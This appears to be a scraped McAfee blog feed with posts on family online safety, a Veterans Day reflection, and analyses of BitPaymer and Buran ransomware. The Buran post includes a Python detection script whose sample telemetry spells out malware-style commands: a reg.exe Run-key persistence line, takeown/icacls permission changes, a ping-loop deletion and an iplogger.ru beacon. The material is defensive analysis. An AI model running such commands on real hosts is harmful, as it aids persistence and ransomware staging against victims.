Technology trends move fast and the digital newsfeeds run non-stop. No worries, we’ve got your backs, parents. Here are three important headlines you may have missed about some of the ways kids are using their devices and how you can coach them around the risks.

What’s Sadfishing and is Your Child Doing it Online?

Sadfishing is the act of someone making exaggerated claims about their emotional problems to generate sympathy from other people online. The concept of sadfishing surfaced when some alleged that celebrity influencers Justin Bieber and Kendall Jenner were engaging fans in a form of sadfishing, which then sparked others to follow suit. The practice is growing to the extent that a recent Digital Awareness UK report, based on interviews with 50,000 schoolchildren, says sadfishing could be damaging teenagers’ self-esteem and leading to bullying.

The risks: Young people who post emotionally-heavy content could be bullied by peers who see a vulnerable post as an empty bid for attention. But here’s where things get murky. Is a person sadfishing for attention or could that person truly be in crisis? Unless you are a professional, there’s no definite way to know since online interactions tend to lack context. For that reason, professionals say that alarming posts should be taken seriously, and everyone should become familiar with how to help someone in an emotional crisis online.

Talking points: Browsing posts and comments on your child’s social feeds is one way to see if your child is sadfishing. Coach your kids on how to express themselves online and to carefully consider the deeper intent of a confessional post before sharing. Encourage your child to ask themselves these questions before posting:

  • What am I hoping to achieve with this post?
  • Could I more effectively work out this issue more if I confided it to a friend or family member face-to-face?
  • Should I journal my feelings privately before sharing them online?

Deepfakes: What Your Family Needs to Know

A deepfake is a video created using artificial intelligence to show real people doing and saying things they never did. Deepfakes can be humorous (like the political deep fakes circulating) or harmful. Deepfakes are on the rise because free apps such as FakeApp and DeepFaceLab allow any amateur to manipulate videos.

The risks: It’s getting tougher to discern real from fake videos, which means that misinformation spreads quickly as does the fallout. Deepfakes can destroy a person’s reputation, spread fake pornography videos, alter election outcomes, or even impact the stock market. Stay tuned for updates, the topic of AI and deepfakes is getting more complex and risky every day.

Talking points: Digital literacy is now a pillar of modern parenting. Teaching kids how to evaluate online information is critical, especially with the rapid growth of AI. Discuss deepfake technology with your kids. Use this Deep Fake overview video to help them understand how the technology works. Explore the topic of personal responsibility online and the ethics of creating misleading content. To spot deepfakes look for things in a video such as lack of eye blinking, shadows or borders that seem wrong, mismatch skin tones, and lip movement that is slightly out of sync with the person’s words.

TikTok App Obsession (and Safety Concerns) on the Rise

TikTok, the looping short-form video app owned by Chinese company ByteDance, that’s also wildly popular with teens, is back in the news for several reasons. Recently U.S. Senators asked the Intelligence Committee to look into whether the Chinese-owned app poses a security risk to the United States. Also, a BBC investigation found that TikTok failed to remove cyber predators from the app who were sending sexually explicit messages to children. And, lastly, reports in the Wall Street Journal claim that Islamic State militants have been posting short propaganda videos to TikTok as part of a recruitment effort.

Risks: In addition to online predators, TikTok users can share inappropriate content such as talk about sex, alcohol, and drugs, and videos of girls wearing suggestive clothing. There’s also the risk of posting regrettable content, data mining (an issue in the past for TikTok), and, as with any app, the very real (and reported) issue of cyberbullying.

Talking points: Anyone over the age of 13 can open a TikTok account, but it’s widely known that elementary-aged kids have accounts. If your child wants a TikTok account, consider downloading the app and looking around. After you’ve explored, discuss why age controls are in place, and consider putting comprehensive parental controls on your family devices. Review the most current device and app safety practices. The National Society for the Prevention of Cruelty to Children (NSPCC) has a great online safety acronym to guide family discussions called TEAM:

  • Talk about staying safe online
  • Explore the online world together
  • Agree on rules about what’s OK and what’s not
  • Manage your family’s settings and controls.

Keeping up with the online trends your kids gravitate to is one of the most important things you can do to keep your family conversations relevant and keep your kids safe online. To stay updated on all of the latest family and mobile security threats, follow @McAfee_Home on Twitter, listen to our podcast Hackable?, and get even more family safety insights on Facebook.

The post Sadfishing, Deepfakes & TikTok: Headlines You May Have Missed appeared first on McAfee Blogs.

Spanish MSSP Targeted by BitPaymer Ransomware https://www.mcafee.com/blogs/other-blogs/mcafee-labs/spanish-mssp-targeted-by-bitpaymer-ransomware/ https://www.mcafee.com/blogs/other-blogs/mcafee-labs/spanish-mssp-targeted-by-bitpaymer-ransomware/#respond Fri, 08 Nov 2019 12:00:53 +0000 https://securingtomorrow.mcafee.com/?p=97348

Initial Discovery

This week the news hit that several companies in Spain were hit by a ransomware attack. Ransomware attacks themselves are not new but, by interacting with one of the cases in Spain, we want to highlight in this blog how well prepared and targeted an attack can be and how it appears to be customized specifically against its victims.

In general, ransomware attacks are mass-spread attacks where adversaries try to infect many victims at the same time and cash out quickly. However, this has significantly changed over the past two years where more and more ransomware attacks are targeting high-value targets in all kinds of sectors.

Victims are infected with a different type of malware before the actual ransomware attack takes place. It looks like adversaries are using the infection base to select or purchase the most promising victims for further exploitation and ransomware, in a similar way to how the sale of Remote Desktop Access on underground forums or private Telegram channels is being used for victim selection for ransomware attacks.

In the following paragraphs, we will take you step by step through the modus operandi of the attack stages and most important techniques used and mapped against the MITRE ATT&CK Framework.

The overall techniques observed in the campaign and flow visualization:

Technical Analysis

The overall campaign is well known in the industry and the crew behind it came back to the scene reusing some of the TTPs observed one year ago and adding new ones like: privilege escalation, lateral movement and internal reconnaissance.

Patient 0 – T1189 Drive-by Compromise

The entry point for these campaigns is a URL that takes the user either to a fake website (when a legitimate site has been compromised) or to a legitimate page (when the actors use a pay-per-install service). Through social engineering, the user is tricked into downloading the desired application, which uses frameworks like Empire or similar software to download and install the next-stage malware, in this case Dridex.

First infection – T1090 Connection Proxy

These types of attacks are not limited to one type of malware; we have observed it being used by:

  • Azorult
  • Chthonic
  • Dridex

It is currently unclear why one would select one malware family above the other, but these tools allow for remote access into a victim’s network. This access can then be used by the actor as a launchpad to further exploit the victim’s network with additional malware, post-exploitation frameworks or the access can be sold online.

For quite some time now, Dridex’s behavior has changed from its original form. Fewer Dridex installs are linked to stealing banking information and more Dridex infections are becoming a precursor to a targeted ransomware attack.

This change or adaptation is something we have observed with other malware families as well.

For this campaign, the Dridex botnet used was 199:

Information Harvesting – T1003 Credential Dumping

Once one or more machines are infected, the next step is to collect as many credentials as possible to perform lateral movement. We observed the use of Mimikatz to collect (high privileged) credentials and re-use them internally to execute additional software on the Active Directory servers or other machines inside the network.

The use of Mimikatz is quite popular, having been observed in the modus operandi of more than 20 different threat actors.

Lateral Movement – T1086 PowerShell

The use of PowerShell helps attackers automate certain things once they are in a network. In this case, we observed how Empire was used with different SOCKS proxy PowerShell scripts to pivot inside the network:

Extracting information about the IP found in the investigation, we observed that the infrastructure for the Dridex C2 panels and this SOCKS proxy was shared.

PowerShell was also used to find specific folders inside the infected systems:

One reason for an attacker to use a PowerShell-based framework like Empire is its modules, such as invoke-psexec or invoke-mimikatz, which can execute remote processes on other systems or harvest credentials from any system where Mimikatz can run. When deployed well, these modules can significantly increase the speed of exploitation.

Once the attackers collected enough high privileged accounts and got complete control over the Active Directory, they would then distribute and execute ransomware on the complete network as the next step of their attack, in this case BitPaymer.

Ransomware Detonation – T1486 Data Encrypted for Impact

BitPaymer seemed to be the final objective of this attack. The actors behind BitPaymer invest time to know their victims and build a custom binary for each, which includes the leet-speak name of the victim as the file extension for the encrypted files, e.g. “financials.<name_of_victim>”.

In the ransomware note, we observed the use of the company name too:

Observations

  • One of the remote proxy servers used in the operation shares the same infrastructure as one of the C2 panels used by Dridex.
  • We observed how a Dridex infection served as a launch point for an extensive compromise and BitPaymer ransomware infection.
  • Each binary of Bitpaymer is specially prepared for every single target, including the extension name and using the company name in the ransomware note.
  • Certain Dridex botnet IDs are seen in combination with targeted BitPaymer infections.
  • Companies must not ignore indicators of activity from malware like Dridex, Azorult or NetSupport; they could be a first indicator of other malicious activity to follow.
  • It is still unclear how the fake update link arrived at the users but in similar operations, SPAM campaigns were most likely used to deliver the first stage.

McAfee Coverage

Based on the indicators of compromise found, we successfully detect them with the following signatures:

  • RDN/Generic.hbg
  • Trojan-FRGC!7618CB3013C3
  • RDN/Generic.dx

The C2 IPs are tagged as malicious in our GTI.

McAfee ATD Sandbox Detonation

Advanced Threat Detection (ATD) is a specialized appliance that identifies sophisticated and difficult to detect threats by executing suspicious malware in an isolated space, analyzing its behavior and assessing the impact it can have on an endpoint and on a network.

For this specific case, the ATD sandbox showcases the activity of Bitpaymer in a system:

We observe the use of icacls and takeown to change permissions on the system; such living-off-the-land techniques are commonly used by different types of malware.

ATD Sandbox extracted behavior signatures observing Bitpaymer detonation in the isolated environment:

Detonating malware in this environment gives indicators of the threat type and its capabilities.

McAfee Real Protect

The samples gathered from this campaign would have been detected by Real Protect. Real Protect is designed to detect zero-day malware in near real time by classifying it based on behavior and static analysis. Real Protect uses machine learning to automate classification; it is signature-less, has a small client footprint, and supports both offline and online modes of classification. Real Protect improves detection by up to 30% on top of .DAT and McAfee Global Threat Intelligence detections, while producing actionable threat intelligence.

YARA RULE

We have a YARA rule available on our ATR GitHub repository to detect some of the versions of BitPaymer ransomware.

IOCs

SHA-1:

  • 3ab42ca8ce81f9df0c4f7cd807528c5dd0fb5108
  • 4862fbb188285586218cd96e69a2e4436827d2fe
  • c1ad6c3ab06fc527c048cd15c6fc701b5a74a900

SHA-256:

  • 1d778359ab155cb190b9f2a7086c3bcb4082aa195ff8f754dae2d665fd20aa05
  • 628c181e6b9797d8356e43066ae182a45e6c37dbee28d9093df8f0825c342d4c
  • bd327754f879ff15b48fc86c741c4f546b9bbae5c1a5ac4c095df05df696ec4f

MD5:

  • 0f630aaf8b5c4e958445ec0c2d5ec47e
  • 9b982fa4b42813279426449ddd6a1dbe
  • c46ad4159c90bc11d6d94a28458553d7

A special thanks to John Fokker and Christiaan Beek for their assistance with this blog.

The post Spanish MSSP Targeted by BitPaymer Ransomware appeared first on McAfee Blogs.

Veterans Day U.S. – A McAfee MoM’s Reflection https://www.mcafee.com/blogs/other-blogs/life-at-mcafee/veterans-day-u-s-a-mcafee-moms-reflection/ https://www.mcafee.com/blogs/other-blogs/life-at-mcafee/veterans-day-u-s-a-mcafee-moms-reflection/#respond Thu, 07 Nov 2019 15:33:59 +0000 https://securingtomorrow.mcafee.com/?p=97332

The post Veterans Day U.S. – A McAfee MoM’s Reflection appeared first on McAfee Blogs.

By: Deb, Executive Assistant, Plano TX

On Monday, November 11, the U.S. celebrates Veterans Day. We at McAfee U.S. are able to spend this holiday paying tribute to coworkers, friends and family members who have served our country in the various branches of military service. Being able to honor, celebrate and remember our nation’s heroes on Veterans Day every year is one of the things that I hold near and dear to my heart.

Wearing RED for a Reason

Anyone who knows me or sees me on Fridays at our Plano headquarters location, knows that I wear red EVERY Friday. I wear RED as a reminder to “Remember Everyone Deployed.”  I’ve recently noticed that many of my peers have also begun to wear red on Fridays. Regardless of whether it’s McAfee red or acknowledging our veterans with RED, I make it a point to acknowledge and thank them for showing their support!  We have such a great team at McAfee-Plano, and I always encourage my colleagues to wear RED. It’s an easy, yet powerful, way to make a statement of support for our veterans!

I am passionate about our military and veterans because I come from a long line of military servants. My dad and brother-in-law both served in the U.S. Air Force. Three of my grandfathers served in the military—two in the U.S. Army and one in the U.S. Army Air Corps. I also have an uncle/Godfather who served as a Navy Seabee. But my most powerful connection to the military is as a MoM (Mother of a Marine). My 19-year-old son, Austin, is a Lance Corporal in the U.S. Marine Corps. I call Austin my tough, awesome, and brave hero. He not only has my back, but he has the backs of all Americans. As his family, we are fortunate that he is currently stationed stateside. Of course, that can change in the blink of an eye.

Making the Sacrifice

Very recently, it has sunk in that my family is living our lives based on someone else’s calendar and the decisions of the U.S. Marine Corps. They have full control over Austin’s schedule and our ability to see him. As easy as a flight can be booked and other plans finalized, a leave can be taken away. In fact, my son’s leave for Thanksgiving this year was recently cancelled. This would have been his first time home since his graduation from boot camp at the end of June 2018. Yes, as a mama, I cried for an entire day when I heard that he would not be able to come home. But then I remembered that his calling is so much bigger than that of a son, a brother, a nephew, or grandson coming home for the holiday. When I remembered that his obligation and commitment is so much greater, my tears had to stop. My pride in him swelled, as did my love for my country. He and his military brothers and sisters, in all branches of service, are out there protecting us and fighting for our freedom. I cannot be selfish with my wishes for him to be home. What I can do is pray for his safety, and the safety of all those serving. And I will continue to be thankful for the sacrifices of all military personnel, past and present, and their families.

Feeling Support at McAfee

One of the reasons I love working here at McAfee is the knowledge that our company is so supportive of those who are actively serving in the military as well as our honored veterans and their family members. As a MoM, it makes me proud when I come to work each Friday and see more and more of my coworkers dressed in red; or I get the opportunity to participate in Veterans events and celebrations. I am grateful for my colleagues’ gestures of support that bring a big smile to my face. McAfee’s strong commitment to Veterans through our Veterans Community and active recruiting of veterans are other reasons I am proud to be a McAfee team member.

Buran Ransomware; the Evolution of VegaLocker https://www.mcafee.com/blogs/other-blogs/mcafee-labs/buran-ransomware-the-evolution-of-vegalocker/ https://www.mcafee.com/blogs/other-blogs/mcafee-labs/buran-ransomware-the-evolution-of-vegalocker/#respond Tue, 05 Nov 2019 17:37:32 +0000 https://securingtomorrow.mcafee.com/?p=97285

The post Buran Ransomware; the Evolution of VegaLocker appeared first on McAfee Blogs.

McAfee’s Advanced Threat Research Team observed how a new ransomware family named ‘Buran’ appeared in May 2019. Buran works as a RaaS model like other ransomware families such as REVil, GandCrab (now defunct), Phobos, etc. The author(s) take 25% of the income earned by affiliates, instead of the 30% – 40% taken by notorious malware families like GandCrab, and they are willing to negotiate that rate with anyone who can guarantee an impressive level of infection with Buran. They announced in their ads that all affiliates will have a personal arrangement with them.

For the analysis we present here, we focus on one of the Buran hashes:

We will highlight the most important observations when researching the malware and will share protection rules for the endpoint, IOCs and a YARA rule to detect this malware.

Buran Ransomware Advertisement

This ransomware was announced in a well-known Russian forum with the following message:

Buran is a stable offline cryptolocker, with flexible functionality and support 24/7.

Functional:

  • Reliable cryptographic algorithm using global and session keys + random file keys;
  • Scan all local drives and all available network paths;
  • High speed: a separate stream works for each disk and network path;
  • Skipping Windows system directories and browser directories;
  • Decryptor generation based on an encrypted file;
  • Correct work on all OSs from Windows XP, Server 2003 to the latest;
  • The locker has no dependencies, does not use third-party libraries, only mathematics and WinAPI;
  • The completion of some processes to free open files (optional, negotiated);
  • The ability to encrypt files without changing extensions (optional);
  • Removing recovery points + cleaning logs on a dedicated server (optional);
  • Standard options: tapping, startup, self-deletion (optional);
  • Installed protection against launch in the CIS segment.

Conditions:

They are negotiated individually for each advert depending on volumes and material.

Start earning with us!

The announcement says that Buran is compatible with all versions of Windows (although during our analysis we found that, on old systems such as Windows XP, the analyzed version did not work) and Windows Server, and also that it will not infect any region inside the CIS segment. Note: the CIS comprises ten former Soviet republics: Armenia, Belarus, Kazakhstan, Kyrgyzstan, Moldova, Russia, Tajikistan, Turkmenistan, Ukraine, and Uzbekistan.

Rig Exploit Kit as an Entry Vector

Based on the investigation we performed, as well as research by “nao_sec” highlighted in June 2019, we discovered that Buran ransomware was delivered through the Rig Exploit Kit. It is important to note that Rig is the preferred EK used to deliver the latest ransomware campaigns.

FIGURE 1. EXPLOIT KIT

The Rig Exploit Kit used CVE-2018-8174 (Microsoft Internet Explorer VBScript Engine, Arbitrary Code Execution) to exploit the client side. After successful exploitation, this vulnerability is used to deliver Buran ransomware to the system.

Static Analysis

The main packer and the malware were written in Delphi to make analysis of the sample more complicated. The malware sample is a 32-bit binary.

FIGURE 2. BURAN STATIC INFORMATION

In our analysis we detected two different versions of Buran, the second with improvements compared to the first one released.

FIGURE 3. BURAN STATIC INFORMATION

The goal of the packer is to decrypt the malware and run it from memory with the RunPE technique. To obtain a cleaner version of the sample, we dumped the malware from memory, obtaining an unpacked version.

Country Protection

Checking locales has become quite popular in RaaS ransomware, as authors want to ensure they do not encrypt data in certain countries. Normally we would expect to see more CIS countries but, in this case, only three are checked.

FIGURE 4. GETTING THE COUNTRY OF THE VICTIM SYSTEM

This function gets the system country and compares it with 3 possible results:

  • 0x7 -> RUSSIAN FEDERATION
  • 0x177 -> BELARUS
  • 0x17C -> UKRAINE

It is important to note here that the advertising of the malware in the forums said it does not affect CIS countries but, with there being 10 nations in the region, that is obviously not entirely accurate.

If the system is determined to be in the Russian Federation, Belarus or Ukraine the malware will finish with an “ExitProcess”.

The next action is to calculate a hash based on its own path and file name on the machine. The 32-bit hash value is concatenated with the extension “.buran”, and a file with that name is created in the victim machine’s TEMP folder. Importantly, if the malware cannot create or write the file in the TEMP folder, it ends its execution; the check is done by extracting the date of the file.

FIGURE 5. BURAN CHECKS IN THE TEMP FOLDER

If the file exists after the check performed by the malware, the temporary file will be erased through the API “DeleteFileW”.

FIGURE 6. CHECK WHETHER A TEMP FILE CAN BE CREATED

This function can be used as a kill switch to avoid infection by Buran.

Buran ransomware can accept special arguments on execution. If it is executed without any special argument, it creates a copy of itself named “ctfmon.exe” in the Microsoft APPDATA folder and launches it using ShellExecute with the verb “runas”. This verb is not in the official Microsoft SDK but, following the MSDN documentation on how it works, we can deduce that the program ignores its own manifest and prompts the user with UAC if that protection is enabled.

This behavior could change depending on the compilation options chosen by the authors and delivered to the affiliates.

According to the documentation, the function “CreateProcess” checks the manifest; in Buran, however, this is avoided by the way the new instance is launched:

FIGURE 7. LAUNCH OF THE NEW INSTANCE OF ITSELF

Buran in execution will create a registry key in the Run subkey section pointing to the new instance of the ransomware with a suffix of ‘*’. The meaning of this value is that Buran will run in safe mode too:

FIGURE 8. PERSISTENCE IN THE RUN SUBKEY IN THE REGISTRY

The writing operation in the registry is done using the “reg” utility, using a one-liner and concatenating different options with the “&” symbol. This method through “reg.exe” avoids a breakpoint in the main binary.

FIGURE 9. WRITE OF PERSISTENCE IN THE REGISTRY

Buran implements this technique to complicate analysis of the sample for malware analysts reverse engineering it. After these operations, the old instance of the ransomware terminates via “ExitProcess”.

Analysis of the Delphi code shows that the second version of Buran identifies the victim using random values.

FIGURE 10. GENERATE RANDOM VALUES

After that it decrypts a registry subkey name, “Software\Buran\Knock”, in the HKEY_CURRENT_USER hive. It checks the current data of that key and, if the key does not exist, adds the value 0x29A (666) to it. Interestingly, we discovered that GandCrab used the same value to generate the victim’s ransom id. If the subkey and value exist, the malware continues its normal flow; if not, it decrypts a URL, “iplogger.ru”, and connects to this domain using a special user agent:

FIGURE 11. SPECIAL USER AGENT BURAN

The referrer of this request is the identifier of the victim infected with Buran.

The result of this operation is the writing of the subkey previously checked with the value 0x29A, to avoid repeating the same operation.

After this action the malware enumerates all network shares with the following functions:

  • WNetOpenEnumA
  • WNetEnumResourceA
  • WNetCloseEnum

This call is made recursively, to collect and save all discovered network shares in a list. This step is necessary because Buran encrypts all reachable network shares in addition to the logical drives. Buran skips optical drives and other non-mounted volumes. The results of these operations are saved for Buran to use later in the encryption process.

The ransom note is encrypted inside the binary and is dumped at run time onto the victim’s machine. In it, the user finds their victim identifier, generated with the random Delphi function mentioned earlier. This identifier is what lets affiliates track their infected users and deliver the decryptor after payment is made.

In the analysis of Buran, we found how this ransomware blacklists certain files and folders. This is usually a mechanism to ensure that the ransomware does not break its functionality or performance.

Blacklisted folders in Buran:

Blacklisted files in Buran:

The encryption process starts with special folders in the system, such as the Desktop folder. Buran can use threads to encrypt files and, during the process, encrypts the drive letters and folders collected earlier in the reconnaissance phase.

The ransom note will be written to disk with the name “!!! YOUR FILES ARE ENCRYPTED !!!” with the following content:

FIGURE 12. AN EXAMPLE RANSOM NOTE

Each encrypted file keeps its original name and receives a new extension made of the random values mentioned above.

For example: “rsa.bin.4C516831-800A-6ED2-260F-2EAEDC4A8C45”.

All the files encrypted by Buran contain a specific file marker:

FIGURE 13. CRYPTED FILE

In terms of encryption performance, we found Buran slower compared to other RaaS families. According to the authors’ advertisement in the underground forums, they are continually improving their piece of ransomware.

Buran Version 1 vs Buran Version 2

In our research we identified two different versions of Buran. The main differences between them are:

Shadow copies delete process:

In the 2nd version of Buran one of the main things added is the deletion of the shadow copies using WMI.

Backup catalog deletion:

Another feature added in the new version is the backup catalog deletion. It is possible to use the Catalog Recovery Wizard to recover a local backup catalog.

System state backup deletion:

In the same line of system destruction, we observed how Buran deletes in execution the system state backup in the system:

Ping used as a sleep method:

As a crude evasion technique, Buran uses ping inside a ‘for loop’ as a sleep, so that the file deletion has time to complete.

The ransom note changed between versions:
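The behaviours described in the Buran sections above (the ctfmon.exe copy in APPDATA launched with “runas”, the reg.exe one-liner adding a Run value with ‘*’, the HKCU\Software\Buran\Knock marker, the iplogger.ru connection, the ping loop used as a sleep, the ransom note name and the random extension) and the icacls/takeown usage noted in the BitPaymer sandbox section translate directly into host-based detection logic. The following Python script is an added example, not McAfee ATR code and not taken from the samples: it runs a small set of behavioural rules over constructed telemetry lines. The ‘kind|key=value’ line format, the field names, the user name, the file paths and the exact command lines are all assumptions of this example, modelled on the text rather than copied from the malware.

```python
"""Behavioural triage for the Buran and BitPaymer tradecraft described above.

Added example, not McAfee ATR code. Telemetry lines are constructed in a
simple 'kind|key=value|...' shape standing in for EDR or Sysmon events; the
field names are assumptions of this example.
"""
import re
from typing import Callable, Dict, List, Tuple

Event = Dict[str, str]

# Constructed telemetry for one host (user name, paths and command lines are
# invented for the example; the behaviours they echo come from the analysis).
SAMPLE_EVENTS = [
    r"process|image=C:\Users\alice\AppData\Roaming\ctfmon.exe|verb=runas|cmd=ctfmon.exe",
    r"process|image=C:\Windows\System32\reg.exe|cmd=reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v ctfmon* /d C:\Users\alice\AppData\Roaming\ctfmon.exe & exit",
    r"registry|key=HKCU\Software\Buran\Knock|value=0x29A",
    r"network|host=iplogger.ru|method=GET",
    r"process|image=C:\Windows\System32\cmd.exe|cmd=cmd /c for /l %i in (1,1,10) do ping -n 2 127.0.0.1 & del C:\Users\alice\AppData\Roaming\ctfmon.exe",
    r"file|op=create|path=C:\Users\alice\Desktop\!!! YOUR FILES ARE ENCRYPTED !!!",
    r"file|op=rename|path=C:\Users\alice\Documents\rsa.bin.4C516831-800A-6ED2-260F-2EAEDC4A8C45",
    r"process|image=C:\Windows\System32\takeown.exe|cmd=takeown /f C:\Users\alice\Documents\financials.xlsx",
    r"process|image=C:\Windows\System32\icacls.exe|cmd=icacls C:\Users\alice\Documents\financials.xlsx /grant Everyone:F",
    r"process|image=C:\Windows\System32\notepad.exe|cmd=notepad.exe",  # benign control
]


def parse_event(line: str) -> Event:
    """Parse 'kind|k=v|k=v' into a dict; the leading field becomes 'kind'."""
    kind, *fields = line.split("|")
    ev: Event = {"kind": kind}
    for field in fields:
        key, _, value = field.partition("=")
        ev[key] = value
    return ev


RUN_KEY = re.compile(r"\\CurrentVersion\\Run\b", re.I)
# An asterisk in a Run value name makes Windows start the entry in Safe Mode too,
# which is the behaviour the analysis attributes to Buran's persistence entry.
STAR_VALUE = re.compile(r"/v\s+\"?[^\s\"]*\*", re.I)
# Random GUID-style extension appended to encrypted files.
GUID_EXT = re.compile(r"\.[0-9A-F]{8}(-[0-9A-F]{4}){3}-[0-9A-F]{12}$", re.I)
# for-loop + ping + del: ping abused as a sleep before a file deletion.
PING_SLEEP = re.compile(r"\bfor\b.*\bping\b.*\bdel\b", re.I)


def _proc(ev: Event) -> Tuple[str, str]:
    return ev.get("image", "").lower(), ev.get("cmd", "")


def ctfmon_in_appdata(ev: Event) -> bool:
    # The real ctfmon.exe lives in System32; a copy under AppData is a masquerade.
    image, _ = _proc(ev)
    return ev["kind"] == "process" and "\\appdata\\" in image and image.endswith("\\ctfmon.exe")


def reg_run_safe_mode(ev: Event) -> bool:
    image, cmd = _proc(ev)
    return (ev["kind"] == "process" and image.endswith("\\reg.exe")
            and bool(RUN_KEY.search(cmd)) and bool(STAR_VALUE.search(cmd)))


def buran_knock_key(ev: Event) -> bool:
    return ev["kind"] == "registry" and ev.get("key", "").lower().endswith("\\software\\buran\\knock")


def iplogger_beacon(ev: Event) -> bool:
    return ev["kind"] == "network" and ev.get("host", "").lower().endswith("iplogger.ru")


def ping_loop_sleep(ev: Event) -> bool:
    _, cmd = _proc(ev)
    return ev["kind"] == "process" and bool(PING_SLEEP.search(cmd))


def ransom_note(ev: Event) -> bool:
    return ev["kind"] == "file" and ev.get("path", "").endswith("!!! YOUR FILES ARE ENCRYPTED !!!")


def guid_extension(ev: Event) -> bool:
    return ev["kind"] == "file" and ev.get("op") == "rename" and bool(GUID_EXT.search(ev.get("path", "")))


def takeown_icacls(ev: Event) -> bool:
    # Living-off-the-land permission changes seen in the BitPaymer detonation.
    image, _ = _proc(ev)
    return ev["kind"] == "process" and (image.endswith("\\takeown.exe") or image.endswith("\\icacls.exe"))


RULES: Dict[str, Callable[[Event], bool]] = {
    "buran.masquerade_ctfmon_appdata": ctfmon_in_appdata,
    "buran.run_key_safe_mode_star": reg_run_safe_mode,
    "buran.knock_registry_marker": buran_knock_key,
    "buran.iplogger_beacon": iplogger_beacon,
    "buran.ping_loop_sleep": ping_loop_sleep,
    "buran.ransom_note_dropped": ransom_note,
    "buran.guid_style_extension": guid_extension,
    "bitpaymer.takeown_icacls_lolbin": takeown_icacls,
}


def triage(lines: List[str]) -> List[Tuple[int, str]]:
    """Return (line_index, rule_name) for every rule that fires on every event."""
    hits: List[Tuple[int, str]] = []
    for idx, line in enumerate(lines):
        ev = parse_event(line)
        for name, pred in RULES.items():
            if pred(ev):
                hits.append((idx, name))
    return hits


def verdict(hits: List[Tuple[int, str]]) -> str:
    """Escalate only when several distinct behaviours fire, not on one noisy rule."""
    names = {name for _, name in hits}
    if len(names) >= 3:
        families = sorted({n.split(".")[0] for n in names})
        return "ransomware-activity: " + ", ".join(families)
    return "low-confidence" if names else "clean"


if __name__ == "__main__":
    for idx, name in triage(SAMPLE_EVENTS):
        print(f"line {idx}: {name}")
    print(verdict(triage(SAMPLE_EVENTS)))
```

The rules deliberately key on behaviour (a Run value name carrying ‘*’, a system binary name under a user profile path, a for/ping/del chain) rather than on the sample hashes, so they survive the per-victim rebuilds and frequent re-versioning the analysis describes; the verdict requires several independent rules before escalating, since takeown/icacls or a single ping loop also occur in legitimate administration.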

VegaLocker, Jumper and Now Buran Ransomware

Beyond the file marker used, the behavior, TTPs and artifacts left in the system let us identify Buran as an evolution of the Jumper ransomware; VegaLocker is the origin of this malware family.

Malware authors evolve their code to improve it and make it more professional. Trying to stay stealthy and confuse security researchers and AV companies could be one reason for changing the name between revisions.

This is the timeline of this malware family:

Similarities in Behavior:

Files stored in the temp folder:

VegaLocker:

Jumper:

Buran:

Registry changes:

VegaLocker:

Buran:

Extension overlapping:

In one of the variants (Jumper) it is possible to spot some samples using both extensions:

  • .vega
  • .jamper

Shadow copies, backup catalog and system backup:

In the analyzed samples we saw that VegaLocker used the same methods to delete the shadow copies, the backup catalog and the system backup.

Coverage

  • RDN/Ransom
  • Ransomware-GOS!E60E767E33AC
  • Ransom
  • RDN/Ransom
  • RDN/Generic.cf
  • Ransom-Buran!

Expert Rule:

Indicators of Compromise

MITRE

The sample uses the following MITRE ATT&CK™ techniques:

  • Disabling Security Tools
  • Email Collection
  • File and Directory Discovery
  • File Deletion
  • Hooking
  • Kernel Modules and Extensions
  • Masquerading
  • Modify Registry
  • Network Service Scanning
  • Peripheral Device Discovery
  • Process Injection
  • Query Registry
  • Registry Run Keys / Start Folder
  • Remote Desktop Protocol
  • Remote System Discovery
  • Service Execution
  • System Time Discovery
  • Windows Management Instrumentation

YARA Rule

We created a YARA rule to detect Buran ransomware samples; the rule is available in our GitHub repository.

Conclusion

Buran represents an evolution of a well-known player in the ransomware landscape. VegaLocker had a history of infections in companies and end-users and the malware developers behind it are still working on new features, as well as new brands, as they continue to generate profits from those actions. We observed new versions of Buran with just a few months between them in terms of development, so we expect more variants from the authors in the future and, perhaps, more brand name changes if the security industry puts too much focus on them. We are observing an increase in ransomware families in 2019, as well as old players in the market releasing new versions based on their own creations.

All the binaries came with a custom packer and already had interesting features to avoid detection or to ensure the user must pay, given the difficulty of retrieving the files. Buran mimics some features from the big players, and we expect more features in future developments.

Buran is slower than other ransomware families we observed, and samples are coded in Delphi which makes reverse engineering difficult.

Are Some Phone Charging Cables Dangerous to Plug in? https://www.mcafee.com/blogs/consumer/hackable/are-some-phone-charging-cables-dangerous-to-plug-in/ https://www.mcafee.com/blogs/consumer/hackable/are-some-phone-charging-cables-dangerous-to-plug-in/#comments Tue, 05 Nov 2019 17:20:39 +0000 https://securingtomorrow.mcafee.com/?p=97322

The post Are Some Phone Charging Cables Dangerous to Plug in? appeared first on McAfee Blogs.

We’ve all felt helpless as our phone’s battery dwindles in a moment of dire need. 25%…15%… 5%. The panic sets in, and suddenly, any port in the proverbial storm will do. You start outlet hunting and maybe even ask strangers if you can borrow their cable. But have you ever wondered whether every charging station and cable is safe?

On the latest episode of “Hackable?” we wanted to find out just how dangerous it is to charge your phone with a hacker-modified cable. White-hat Craig Young ships our producer Pedro a secretly sinister cable and together they launch an attack on host Geoff’s phone and computer. Listen and learn just how much low-battery anxiety could put you at risk if you end up charging with the wrong cable!

Helping Kids Think Critically About Influencers They Follow Online https://www.mcafee.com/blogs/consumer/family-safety/helping-kids-think-critically-about-influencers-they-follow-online/ https://www.mcafee.com/blogs/consumer/family-safety/helping-kids-think-critically-about-influencers-they-follow-online/#respond Sun, 03 Nov 2019 15:29:09 +0000 https://securingtomorrow.mcafee.com/?p=97262

The post Helping Kids Think Critically About Influencers They Follow Online appeared first on McAfee Blogs.

When I was a teenager, my role model was Olympic gymnast Mary Lou Retton. I admired everything about her. I cut my hair like hers and brushed my teeth three times a day, determined to get my smile to sparkle like hers. I even started eating Wheaties when she endorsed them, thinking it would help me land my back handspring (spoiler alert: it didn’t).

It’s natural and healthy to seek out role models. Who doesn’t want to excel at a skill or possess admirable qualities? Teens today are no different. They look to others to figure out how to attain their goals. But while kids today may have the same emotional desire for role models, the online culture has confused the meaning of influence.

Algorithm vs. Character

We no longer bestow titles like role model and influencer on the few, but the many. And the requirements? Not too steep. Today, influencers win the public’s affections based on the number of likes, follows, shares, or sponsors a person accumulates. When it comes to emulating others, kids turn to famous Instagrammers and YouTubers whose fame is determined by algorithm strength rather than character strength.

